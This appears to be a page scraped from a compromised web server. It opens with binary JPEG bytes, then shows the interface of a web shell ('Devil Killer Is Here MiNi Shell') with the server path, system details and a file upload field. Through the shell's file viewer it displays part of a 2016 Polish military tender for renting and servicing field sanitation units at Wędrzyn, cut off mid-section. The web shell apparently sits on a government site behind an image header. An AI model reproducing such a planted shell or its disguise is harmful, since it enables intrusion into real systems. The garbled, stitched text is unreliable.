JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160817/301410-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 301410 - 2016
              z dnia 2016-08-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wędrzyn: usługa polegająca na wynajmie i bieżącej obsłudze polowych węzłów sanitarnych wyposażonych w kabiny natryskowe, umywalki oraz przenośne toalety na terenie obozowisk poligonowych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>45 Wojskowy Oddział Gospodarczy, krajowy numer identyfikacyjny
              8052101800000, ul.
               
              ,
              69211  
              Wędrzyn, woj.
              lubuskie, państwo
              , tel.
              957 556 236, e-mail
              , faks
              957 556 222.
              <br />
              Adres strony internetowej (URL): www.45wog.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka Oranizacyjna Skarbu Pastwa pdległa MOM</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.45wog.wp.mil.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.45wog.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br />nie</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />nie</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Pod adres:
                <br />45 Wojskowy Oddział Gospdarczy ,69-211 Wędrzyn; Kancelaria Jawna pokój nr 211</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>usługa polegająca na wynajmie i bieżącej obsłudze polowych węzłów sanitarnych wyposażonych w kabiny natryskowe, umywalki oraz przenośne toalety na terenie obozowisk poligonowych<br /><b>Numer referencyjny: </b>58/2016/INFRA<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest:

I. 1. Zamawiający zleca, a Wykonawca zobowiązuje się do wykonania usługi podstawowej 
polegającej na wynajmie i bieżącej obsłudze funkcjonowania polowego węzła sanitarnego na okres 26 dni (od 29.08.2016r. do 23.09.2016r.) składającego się z :
1.1.Kontenerów sanitarnych wyposażonych w co najmniej  40 natrysków  i  40  umywalek, (40 stanowisk x 26 dni = 1040 stan./dni)
1.2.Przenośnych kabin WC Standard w ilości 30 szt. (30 kabin x 26dni = 780 obsług).
1.3. Przez pojęcie polowy węzeł sanitarny rozumie się kontenery sanitarne i przenośne kabiny WC.

2. Szczegółowy opis przedmiotu niniejszej umowy:
1.	Usługa sanitarna polegająca na wynajmie i obsłudze bieżącej funkcjonowania polowego węzła sanitarnego na okres 26 dni (od 29.08.2016r. do 23.09.2016r.) składającego się z :
1.1.	Kontenerów sanitarnych wyposażonych w co najmniej  40 natrysków  i  40 umywalek, (40 stanowisk x 26 dni = 1040 stan./dni)
1.2.	Przenośnych kabin WC Standard w ilości 30 szt. (30 kabin x 26 dni = 780 obsług)
1.3.	Lokalizacja : Poligon Wędrzyn  Obozowisko nr 1

2.	Wyposażenie polowych węzłów sanitarnych :
2.1.	Kontenery sanitarne muszą być wyposażone w:
2.1.1.	Prysznice.
2.1.2.	 Umywalki.
2.1.3.	  Dozowniki do mydła.
2.1.4.	 Przeciwpoślizgową podłogę.
2.1.5.	 Lustro nad każdą umywalką.
2.1.6.	Wieszaki na ubranie.
2.1.7.	Instalację elektryczną wyposażoną w przeciwporażeniowe wyłączniki różnicowo- prądowe.
2.1.8.	Hermetyczne oświetlenie wewnętrzne.
2.1.9.	Instrukcję obsługi i użytkowania kontenera sanitarnego.
2.1.10.	Za 1 stanowisko w kontenerze sanitarnym uważa się kpl. 1 stanowiska natryskowego i 1 umywalki z lustrem.

3.	Przenośne kabiny WC :
3.1.	 WC- Standard - urządzenie sanitarne z wyposażeniem standardowym: pisuar, sedes, podajnik na papier, wieszak na ubranie, antypoślizgową podłogę, zamek wewnętrzny, wskaźnik wolne/zajęte, wentylację podwójną (zbiornika na fekalia i kabiny WC; papier toaletowy.

4.	Zakres usługi :
4.1.Kontenery sanitarne- usługa obejmuje: 
4.1.1.Wynajem kontenera.
4.1.2.Transport w terminie i miejsce wskazane przez Zamawiającego.
4.1.3.Ustawienie na miejscu przeznaczenia, montaż wraz ze zbiornikami na wodę czystą i brudną. Zamawiający nie zapewnia przyłączenia do sieci wodociągowej i kanalizacyjnej.
4.1.4.  Sukcesywne dostawy wody oraz odbiór nieczystości.
4.1.5.  Uzupełnianie mydła w dozownikach. 
4.1.5.  Zabezpieczenie zasilania kontenera w energię do oświetlenia i ogrzewania   wody. Zamawiający nie zapewnia miejsca podłączenia do sieci elektrycznej.
4.1.6. Zapewnienie niezależnego źródła energii  wraz z paliwem i innymi materiałami eksploatacyjnymi, zapewniającymi  dostawę cieplej wody o temperaturze wody przeznaczonej do kąpieli, tj. ok.50°C, do wszystkich punktów czerpalnych w kontenerze, przez minimum 12 godzin na dobę zgodnie z grafikiem ustalonym z użytkownikiem. 
4.1.7.  Zapewnienie 24 h. dostępu do kontenerów w celu korzystania dla celów higieniczno  sanitarnych z wody zimnej. 
4.1.8.  Zabezpieczenie ciągłej  obsługi kontenerów przez wykwalifikowany  personel Wykonawcy.
4.1.9. Codzienne sprzątanie kontenerów wewnątrz i na zewnątrz w promieniu         1, 5 m  od płaszczyzn zewnętrznych. Utrzymanie ładu i estetyki.
4.1.10. 1 raz na dobę zmycie i dezynfekcję kontenerów wewnątrz i na zewnątrz środkami posiadającymi atest dopuszczający do stosowania na terytorium Polski;
4.1.11.Usunięcie i utylizacja wszelkich zanieczyszczeń wynikających 
z przeprowadzonych czynności obsługowych.
4.1.12. Ustawienie kontenerów w sposób stabilny tak, aby nie zagrażały zdrowiu osób  korzystających z kąpieli;
4.1.13. Bieżąca naprawa usterek w  kontenerach lub ich wyposażeniu.
4.2.  Kabiny WC  usługa obejmuje :
4.2.1.  Wynajem przenośnych kabin WC typu Standard  
4.2.2.  Transport w terminie i w miejsce wskazane przez Zamawiającego.
4.2.3.  Ustawienie na miejscach przeznaczenia. 
4.2.4. Codzienny ( 1 x na dobę) serwis  kabiny obejmujący : uzupełnienie mydła w   dozownikach do poziomu max, uzupełnienie ręczników papierowych w podajnikach do poziomu max,  uzupełnianie papieru toaletowego, odbiór fekali, dezynfekcja oraz utrzymanie kabin w czystości.

5.	Ogólne wymagania dotyczące materiałów.
5.1.Wykonawca w cenie usługi zabezpiecza  papier toaletowy i ręczniki jednorazowe w dostatecznej ilości oraz środki myjące i dezynfekujące posiadając atest dopuszczający do stosowania na terytorium Polski.

6.	Kontrola, jakości serwisu kabin WC i kontenerów sanitarnych.
6.1.	Wykonawca jest odpowiedzialny za prawidłowe wykonanie usługi,
6.2.	Wykonawca sporządza i prowadzi rejestr potwierdzeń wykonania serwisów 
 i wywozu nieczystości płynnych.
6.3.	Czynności serwisowe muszą być potwierdzone w formie rejestru podpisanego przez osobę sporządzającą i zatwierdzone przez Kierownika SOI Wędrzyn.
6.4.	Wykonawca bezzwłocznie, przed rozpoczęciem realizacji umowy dostarczy 
do Infrastruktury 45 WOG jeden egzemplarz Instrukcji warunków użytkowania urządzeń sanitarnych będących przedmiotem usługi.
6.5.	Wykonawca sporządzi ,w uzgodnieniu ze wskazanym przez Zamawiającego użytkownikiem polowego węzła sanitarnego, grafik godzin podawania ciepłej wody w kontenerach sanitarnych. 

7. Inne postanowienia dotyczące realizacji przedmiotu zamówienia:

7.1.	Zamawiający wskaże punkt poboru wody na zabezpieczenie zamówienia. Woda zostanie przekazana nieodpłatnie, co Wykonawca winien uwzględnić przy kalkulacji cenowej zamówienia.
7.2.	W miejscach ustawienia kontenerów sanitarnych nie ma możliwości podłączenia do sieci wodociągowej, kanalizacyjnej i elektrycznej.
7.3.	Zamawiający nie zapewnia dźwigów i pojazdów do przewozu i ustawienia urządzeń sanitarnych.
7.4.	Samochody przeznaczone do realizacji usługi powinien być pojazdami 
o podwyższonych możliwościach pokonywania terenu oraz wyposażony 
w sprzęt umożliwiający prawidłowe wykonanie serwisu.
7.5.	Wykonawca przedstawi Zamawiającemu dokumenty (oryginały lub kserokopie poświadczone za zgodność)  dotyczące następujących badań kontenerów sanitarnych:
7.5.1.	pomiar szybkiego samoczynnego wyłączenia zasilania urządzeń    
elektroenergetycznych,
7.5.2.	rezystancji izolacji,
7.5.3.	zabezpieczeń różnicowo-prądowych,
7.6.	    Wykonawca musi posiadać potencjał techniczny oraz dysponować przeszkolonym personelem pozwalającym na:
7.6.1.	transport i ustawienie poszczególnych urządzeń sanitarnych 
w określonym  czasie i miejscach.
7.6.2.	wykonywanie bieżącego serwisowania urządzeń sanitarnych 
z częstotliwością i w zakresie określonym w niniejszym opisie przedmiotu zamówienia;
7.6.3.	bieżące uzupełnianie zbiorników poszczególnych urządzeń czysta wodą;
7.6.4.	bieżący wywóz nieczystości płynnych ( ścieków) gwarantujący prawidłowe użytkowanie urządzeń oraz  nie dopuszczający do przepełnienia się zbiorników nieczystości. Wykonawca zobowiązany jest do wywozu nieczystości do właściwych terytorialnie oczyszczalni ścieków zgodnie z posiadanymi zezwoleniami oraz przepisami prawa obowiązującego w tym zakresie; 
8.	Wykonana usługa, w tym każdorazowa realizacja poszczególnych jej elementów składowych musi być potwierdzona protokołem odbioru podpisanym przez Wykonawcę i  Zamawiającego. Protokół odbioru wraz z wykazem wykonanych czynności jako załącznik do prawidłowo wystawionej faktury VAT stanowić będzie podstawę do ustalenia wartości usługi. Brak protokołu podpisanego przez przedstawiciela Zamawiającego i Wykonawcy będzie równoznaczny z niewykonaniem usługi. 
9.	 Oferowane ceny muszą zawierać wszystkie składniki kosztów związane z wykonaniem usługi, a w szczególności z wynajęciem przenośnych urządzeń sanitarnych, dostarczeniem i ustawieniem ich przez Wykonawcę w miejsca wskazane przez Zamawiającego, wraz z serwisem początkowym, wykonaniem usług serwisowych, zapewnienie źródeł zasilania (agregaty prądotwórcze) wraz z paliwem i innymi materiałami eksploatacyjnymi a także obsługi przez wykwalifikowany personel Wykonawcy oraz odbiór urządzeń wraz z uprzątnięciem terenu.
10.	Wykonawca zapewnia  dyspozycyjność osoby upoważnionej do reprezentowania  Wykonawcy i jego pracowników w miejscu świadczenia usługi zgodnie z opcją wskazaną przez Wykonawcę w Formularzu ofertowym.
    11. Wykonawca zapewnia prawidłowe funkcjonowanie polowych węzłów sanitarnych również przy ujemnych temperaturach zewnętrznych.

II. Zamawiający zastrzega możliwość skorzystania z prawa opcji, o której mowa w art.34 ust.5 ustawy Pzp, w ramach, którego zakłada, że:
	1) szacowana wielkość prawa opcji nie przekroczy 50% zamówienia podstawowego 
	i wyniesie maksymalnie...zł brutto, 
	2) prawo opcji realizowane będzie na takich samych warunkach jak zamówienie 	podstawowe, w czasie trwania umowy,
	3) cena jednostkowa prawa opcji będzie identyczna jak zamówienia podstawowego, 	określona w Formularzu cenowym dołączonym do oferty złożonej przez 	Wykonawcę
           (załącznik nr 3 do umowy),
	4) o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje Wykonawcę 	odrębnym pismem, z wyprzedzeniem 5- dniowym,
	5)	zgodnie z prawem opcji Zamawiający może zamawiać usługi sanitarne
            zapisane w Formularzu cenowym w dowolnej konfiguracji, w zależności od bieżącego 	zapotrzebowania,
	6)	realizacja zamówienia z prawem opcji uzależniona będzie od potrzeb
            Zamawiającego, 	
           7) Zamawiający przewiduje możliwość opcji przedłużenia funkcjonowania
           polowych węzłów sanitarnych dla:
      	1.	stanowisk natryskowych w kontenerach sanitarnych o 520 stan./dni.
      	2.        przenośnych kabin sanitarnych WC Standard o 390 obsług.
          8) Zamawiający dopuszcza, w ramach przedłużenia funkcjonowania polowych węzłów
           sanitarnych, możliwość realizacji usługi w m. Wędrzyn, Międzyrzecz  i Skwierzyna.
          9) W przypadku zamiaru korzystania z opcji przedłużenia funkcjonowania polowych
          węzłów sanitarnych Zamawiający powiadomi Wykonawcę o tym fakcie 
          z wyprzedzeniem minimum 5 dni od planowanego terminu, podając rodzaj i ilość 
          elementów mających wejść w skład węzła oraz termin i miejsce wykonywania usługi

<br /><br /><b>II.5) Główny kod CPV: </b>90600000-3<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający zastrzega możliwość skorzystania z prawa opcji, o której mowa w art.34 ust.5 ustawy Pzp, </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca spełni warunek, jeżeli wykaże, że posiada:
2.1.1. zezwolenie w drodze decyzji wójta, burmistrza, prezydenta miasta właściwego ze względu na miejsce świadczenia usług  opróżniania zbiorników bezodpływowych i transport nieczystości ciekłych na terenie gminy Sulęcin, Skwierzyna, Międzyrzecz.

<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek,  jeżeli wykaże:
2.2.1 Zamawiający nie wymaga w sposób szczególny wykazania przez Wykonawcę spełnienia tego warunku; Wykonawca spełni warunek, jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu;
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek,  jeżeli wykaże:
2.3.1.Zamawiający nie wymaga w sposób szczególny wykazania przez Wykonawcę spełnienia tego warunku; Wykonawca spełni warunek, jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu;
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Do oferty każdy Wykonawca musi dołączyć aktualne na dzień składania ofert: 1.1. oświadczenie o braku podstaw do wykluczenia w zakresie wskazanym w Załączniku nr 3 do SIWZ;
1.2.oświadczenie o niezaleganiu w opłacaniu podatków i składek -załącznik nr 4 do SIWZ
1.3. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert;
1.4 oświadczenie Wykonawcy o przynależności lub braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej Wykonawca  składa wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania  z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu-załącznik nr 6 do SIWZ

Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym  wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. W przypadku wykonawców wspólnie ubiegających się o niniejsze zamówienie, każdy z nich składa przedmiotową listę oddzielnie.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- oświadczenia dotyczące spełniania warunków udziału w postępowaniu  
 w zakresie wskazanym w Załączniku nr 2 do SIWZ
-zezwolenie w drodze decyzji wójta, burmistrza, prezydenta miasta właściwego ze względu na miejsce świadczenia usług  opróżniania zbiorników bezodpływowych i transport   nieczystości ciekłych na terenie gminy Sulęcin, Skwierzyna, Międzyrzecz
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
